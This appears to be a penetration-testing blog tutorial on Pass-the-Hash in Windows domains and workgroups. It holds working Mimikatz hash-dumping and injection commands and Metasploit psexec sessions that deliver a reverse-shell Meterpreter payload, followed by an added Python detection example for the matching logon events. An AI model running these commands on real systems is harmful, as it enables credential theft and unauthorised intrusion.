
Intranet penetration: Pass-the-Hash attacks

2022-06-09 05:05:00 Luckysec

Preface

During intranet penetration you often recover an administrator's password hash but cannot crack it back to the plaintext. The hash does not need to be cracked: a Pass-the-Hash (PtH) attack uses it directly to authenticate to other machines on the network and move laterally from the compromised host.

0x01 Pass-the-Hash

Pass-the-Hash (PtH) abuses the design of NTLM authentication: the NTLM challenge-response is keyed by the NT hash of the password, never by the password itself, so whoever holds the hash can answer the server's challenge exactly as the legitimate user would. In a domain environment many computers are deployed from the same image and keep the same local administrator account and password; when that is the case, a hash taken from one machine logs the attacker in to every other machine that shares it.

PtH therefore saves the attacker the time of cracking the hash to a plaintext password. This matters most on Windows 8.1 / Windows Server 2012 R2 and later, which by default no longer keep plaintext passwords in LSASS memory, so the hash is frequently the only credential material available. Attackers use tools such as Mimikatz or Metasploit to present the hash to remote machines for authentication and take control of them.

  • A detailed explanation of the Pass-the-Hash principle: https://www.4hou.com/posts/V0xO

Workgroup environment:

  • On machines before Windows Vista, the hash of any user in the local Administrators group can be used.
  • From Windows Vista on, UAC remote restrictions apply: only the built-in Administrator account (RID 500, the account whose SID ends in -500) receives a full administrative token over the network, so only its hash can be used for Pass-the-Hash. Other local administrators (members of Administrators other than the RID 500 account) receive a filtered token and the attempt is rejected with access denied. This behaviour is controlled by the registry value HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy; if an administrator has set it to 1, the hash of every local administrator works again.

Domain environment:

  • Domain accounts are not subject to UAC remote restrictions, so the hash of any domain user can be passed; what it gives you depends on the rights that user holds on the target. The hash of a member of the Domain Admins group (the account does not have to be named Administrator) grants administrative access to every domain-joined machine, which is the case this article uses.
  • The RID 500 account logs on with a full administrative token ("full token mode") and runs everything with full privileges. Other members of the local Administrators group receive a filtered token when they log on remotely, with the administrative privileges stripped by UAC. Some environments rename the built-in Administrator account; renaming changes the name but not the RID, so the account is still identified by its SID ending in -500.

0x02 Mimikatz

Suppose you have compromised a machine on which a member of the Domain Admins group has logged on, and you hold local administrator rights on it. Mimikatz can then dump the NTLM hashes of both the local administrators and the domain administrators from LSASS memory:

# Run Mimikatz, dump the logon credentials and save the output to mimikatz.log
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

2.1 Domain environment

First use Mimikatz to obtain the NTLM hash of a user in the Domain Admins group:

 Domain: LUCKYSEC.CN
 Domain admin user: LUCKYSEC\admins
 NTLM hash of that user: 518b98ad4178a53695dc997aa02d455c

Mimikatz needs administrator rights (privilege::debug requires SeDebugPrivilege), so run it from an elevated CMD on any domain machine where you have local administrator rights, then pass the hash to the target machine (10.10.10.10):

# Mimikatz Pass-the-Hash command format:
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:<domain> /ntlm:xxxxxx"
# Example:
mimikatz "privilege::debug" "sekurlsa::pth /user:admins /domain:LUCKYSEC.CN /ntlm:518b98ad4178a53695dc997aa02d455c"

# Establish an IPC$ connection
net use \\10.10.10.10
# List the files on the target's C: drive
dir \\10.10.10.10\c$

When the command succeeds, Mimikatz spawns a new CMD window whose logon session carries the injected hash (sekurlsa::pth starts cmd.exe by default; /run: selects a different program). Commands typed in that window, and only in that window, authenticate to the target with the passed hash, so the IPC$ connection is made from there.


Sometimes `dir` against the IP address is rejected with a user name or password error. Use the target's host name instead:

dir \\AD-2016\c$

Connecting by IP address forces NTLM, while connecting by host name lets the client request a Kerberos ticket; the key injected by sekurlsa::pth also works for Kerberos (over-pass-the-hash), which is why the host-name form typically succeeds where the IP form is refused.


2.2 Workgroup environment

First use Mimikatz to obtain the NTLM hash of the local Administrator account on the compromised host:

 Local administrator account: Administrator
 NTLM hash of the local administrator password: 518b98ad4178a53695dc997aa02d455c

Suppose the target machine (10.10.10.20) has a built-in Administrator account with the same password as the one on the compromised host. Identical passwords produce identical NT hashes (the NT hash is unsalted MD4 over the UTF-16LE password), so the hash can be passed to the target. In a workgroup the /domain: parameter takes the target's host name or IP address instead of a domain name.

# Mimikatz Pass-the-Hash command format:
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:<target IP> /ntlm:xxxxxx"

# Example:
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:10.10.10.20 /ntlm:518b98ad4178a53695dc997aa02d455c"

# Establish an IPC$ connection
net use \\10.10.10.20
# List the files on the target's C: drive
dir \\10.10.10.20\c$
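The procedures in 2.1 and 2.2 leave predictable traces in the Windows Security log, and a practitioner should know what the defender sees. The following added Python example (not part of the original article) runs the two checks a detection engineer would write over hand-constructed sample Event 4624 records: the credential injection on the attacker's host (logon type 9 via the seclogo logon process) and the resulting NTLM network logon on the target (logon type 3, NTLM, KeyLength 0). Host names, the attacker address 10.10.10.5 and all field values are constructed; the type 9 rule is a heuristic that also matches `runas /netonly`, which the output says explicitly.

```python
from typing import Dict, List

# Added example, not from the original article. Field names follow the EventData
# names of Security Event 4624; the records below are constructed by hand.
#
# Attacker host: sekurlsa::pth calls LogonUser with NewCredentials (type 9); the
# event names the logon process "seclogo", package Negotiate, and records the
# injected account in TargetOutboundUserName / TargetOutboundDomainName.
# Target host: the passed hash arrives as a network logon (type 3) over NTLM
# with KeyLength 0, where Windows clients normally negotiate 128.

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4624", "Computer": "WIN10-PC", "LogonType": "9", "LogonProcessName": "seclogo",
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "luckysec", "TargetDomainName": "WIN10-PC",
     "TargetOutboundUserName": "admins", "TargetOutboundDomainName": "LUCKYSEC.CN", "IpAddress": "-"},
    {"EventID": "4624", "Computer": "AD-2016", "LogonType": "3", "LogonProcessName": "NtLmSsp ",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2", "TargetUserName": "admins",
     "TargetDomainName": "LUCKYSEC", "KeyLength": "0", "IpAddress": "10.10.10.5"},
    # Ordinary NTLM network logon from a Windows client: 128-bit key, not flagged.
    {"EventID": "4624", "Computer": "AD-2016", "LogonType": "3", "LogonProcessName": "NtLmSsp ",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2", "TargetUserName": "jdoe",
     "TargetDomainName": "LUCKYSEC", "KeyLength": "128", "IpAddress": "10.10.10.33"},
    # Kerberos network logons also report KeyLength 0, so the NTLM check must key on the package.
    {"EventID": "4624", "Computer": "AD-2016", "LogonType": "3", "LogonProcessName": "Kerberos",
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "admins",
     "TargetDomainName": "LUCKYSEC", "KeyLength": "0", "IpAddress": "10.10.10.33"},
    # Interactive logon on the attacker host: type 2, not flagged.
    {"EventID": "4624", "Computer": "WIN10-PC", "LogonType": "2", "LogonProcessName": "User32 ",
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "luckysec", "TargetDomainName": "WIN10-PC",
     "IpAddress": "127.0.0.1"},
]


def is_injected_logon(ev: Dict[str, str]) -> bool:
    """Type 9 NewCredentials logon through seclogo: sekurlsa::pth, but also runas /netonly."""
    return (ev.get("EventID") == "4624"
            and ev.get("LogonType") == "9"
            and ev.get("LogonProcessName", "").strip().lower() == "seclogo"
            and ev.get("AuthenticationPackageName") == "Negotiate")


def is_pth_network_logon(ev: Dict[str, str]) -> bool:
    """Type 3 NTLM logon with a zero-length session key, typical of non-Windows NTLM clients and PtH tools."""
    return (ev.get("EventID") == "4624"
            and ev.get("LogonType") == "3"
            and ev.get("AuthenticationPackageName") == "NTLM"
            and ev.get("KeyLength") == "0")


def triage(events: List[Dict[str, str]]) -> List[str]:
    """Return one alert line per suspicious event; non-matching events are dropped."""
    alerts: List[str] = []
    for ev in events:
        if is_injected_logon(ev):
            alerts.append(
                f"{ev['Computer']}: credential injection (sekurlsa::pth or runas /netonly) as "
                f"{ev.get('TargetOutboundDomainName', '?')}\\{ev.get('TargetOutboundUserName', '?')} "
                f"by {ev['TargetDomainName']}\\{ev['TargetUserName']}")
        elif is_pth_network_logon(ev):
            alerts.append(
                f"{ev['Computer']}: NTLM network logon with KeyLength 0 for "
                f"{ev['TargetDomainName']}\\{ev['TargetUserName']} from {ev['IpAddress']}; "
                f"check whether {ev['IpAddress']} is a Windows host and whether the account should reach this machine")
    return alerts


if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

Neither rule is conclusive on its own: the type 9 rule fires on legitimate `runas /netonly`, and the KeyLength 0 rule fires on Linux SMB clients and scanners. The combination that matters is a seclogo logon on one host followed shortly by KeyLength 0 NTLM logons for the same account on others, so in practice the two alert streams are joined on account name and time.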


0x03 MSF

First get a session back to Metasploit with an ordinary reverse shell (Meterpreter), then run post/windows/gather/hashdump in that session to dump the LM:NTLM hashes of the local accounts.


3.1 Domain environment

Attack prerequisites:

 Domain: LUCKYSEC.CN
 Domain admin user: admins
 LM:NTLM hash of that user: aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c

Pass-the-Hash with exploit/windows/smb/psexec. The smbpass option accepts the LM:NTLM pair directly; the LM half aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, which is what hashdump reports when LM hashing is disabled. For a domain account also set smbdomain LUCKYSEC.CN, otherwise the module presents the user as a local account of the target and the logon usually fails:

msf6 > use exploit/windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.2
lhost => 10.10.10.2
msf6 exploit(windows/smb/psexec) > set rhost 10.10.10.10
rhost => 10.10.10.10
msf6 exploit(windows/smb/psexec) > set smbuser admins
smbuser => admins
msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
smbpass => aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
msf6 exploit(windows/smb/psexec) > exploit


3.2 Workgroup environment

Attack prerequisites:

 Local administrator account: Administrator
 LM:NTLM hash of the local administrator password: aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c

Pass-the-Hash with exploit/windows/smb/psexec against the target (10.10.10.20), whose built-in Administrator shares the password and therefore the hash. Because the target is a workgroup machine, smbdomain is left at its default (the local machine):

msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.2
lhost => 10.10.10.2
msf6 exploit(windows/smb/psexec) > set rhost 10.10.10.20
rhost => 10.10.10.20
msf6 exploit(windows/smb/psexec) > set smbuser Administrator
smbuser => Administrator
msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
smbpass => aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
msf6 exploit(windows/smb/psexec) > exploit
